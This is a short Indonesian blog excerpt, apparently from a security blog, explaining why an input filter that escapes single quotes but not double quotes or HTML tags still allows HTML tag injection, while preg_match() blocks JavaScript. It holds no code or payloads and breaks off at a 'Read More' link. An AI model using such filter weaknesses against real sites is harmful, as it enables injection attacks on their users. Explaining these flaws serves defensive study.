Pada contoh diatas, setiap aphostrope(kutip satu ‘) dirubah menjadi : \’ dimana langkah ini adalah baik karena jika hal tersebut diijinkan hacker dapat sangat mungkin untuk menambahkan javascript ke dalamnya. Tetapi ada 1 hal lainnya yaitu quotes(kutip dua) dan tag HTML tidak di-encode/di-escape. Ini sangat memungkinkan hacker untuk melakukan injeksi tag HTML. Namun script javascript disini tidak dapat di-inject kedalamnya, karena penggunaan dari preg_match() nya PHP.
Bukan berarti tag
Read More
 
rh3d aL3rt © 2012 Templates | rh3d aL3rt